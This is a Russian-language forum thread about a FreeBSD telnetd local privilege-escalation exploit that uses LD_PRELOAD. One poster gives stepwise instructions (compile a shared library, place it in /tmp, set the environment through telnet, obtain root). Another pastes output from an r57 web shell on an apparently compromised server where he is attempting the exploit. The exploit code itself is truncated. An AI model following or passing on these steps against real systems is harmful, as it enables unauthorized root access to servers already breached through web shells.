![]() |
Получение root привилегий через telnetd демон во FreeBSD
Инфомация взята с opennet.ru
Первоисточник: http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067954.html Цитата:
|
Забавно :)
Опишешь, через что использовать эксполит ? |
Уязвимость чисто теоретическая, с тех пор как изобрели ssh, только самоубийцы будут держать на своих серверах демон telnetd. Уже лет 10 как telnetd никто не использует.
|
Цитата:
зато в 7.0 на ура :) делал все как написано в источнике: 1. создаем файл hack.c Код:
#include <unistd.h>Код:
gcc -o hack.o -c hack.c -fPICКод:
mv lib.so.1.0 /tmpКод:
$idКод:
auth disable SRAКод:
Trying 127.0.0.1...Код:
# id |
http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067960.html
|
блин, на
FreeBSD 4.7-RELEASE-p28 не катит :( ------------------------- nc big***.***.net 11*** Password:*** welcome to r57 shell Warning: no access to tty (Bad file descriptor). Thus no job control in this shell. big**** /usr/local/phpMyAdmin-2.10.0.2-all-languages> telnet auth disable SRA environ define LD_PRELOAD /tmp/libGLo.so.1.0 open localhost telnet> telnet> telnet> Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. FreeBSD/i386 (big***.r***.net) (ttyp1) login: -------------------------------------------------- Уже почти неделю с этим сервером мучаюсь :( |
В 7.0 переписали код так что теперь 4.7 в отношении телнета более безопасно. клево блин.
|
| Время: 01:02 |